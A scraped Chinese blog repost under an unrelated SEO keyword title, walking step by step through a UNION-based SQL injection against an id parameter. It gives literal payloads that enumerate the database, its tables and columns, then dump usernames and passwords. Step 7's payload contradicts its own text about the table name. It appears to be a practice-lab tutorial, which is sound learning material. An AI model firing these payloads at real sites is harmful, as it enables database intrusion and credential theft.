您的位置：首页 > 游戏 > 游戏 > 中国十大营销专家_如何做网站服务器_seo上排名_网络维护培训班

中国十大营销专家_如何做网站服务器_seo上排名_网络维护培训班

2025/4/8 3:38:20 来源：https://blog.csdn.net/m0_60984906/article/details/146036376 浏览: 次关键词：中国十大营销专家_如何做网站服务器_seo上排名_网络维护培训班

1.判断是否存在漏洞

添加and 1=1发现正常显示，添加and 1=2无回显条目，则存在sql注入漏洞

2.因为有回显，尝试union联合注入，使用order by判断出有3个字段

3.使用union联合注入查看回显位，发现3三个字段均有回显，任意使用字段注入即可

4.获取数据库名

?id=-1 union select database(),2,3

5.获取表名，这时候发现如果使用1和2回显位会显示报错，那么可以使用3回显位回显

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()

6.猜测用户可能存在user或users表中，先使用user表查看字段

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="user"

7.查看id=1的username和password

这里应该不是user表，真是用户存在users表，将表名改为users一样

?id=-1 union select 1,2,group_concat(username,',',password) from user where id=1

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

热搜词

声明：本站所有新闻及新闻图片来源于其他网站，如有侵权，请及时联系我们！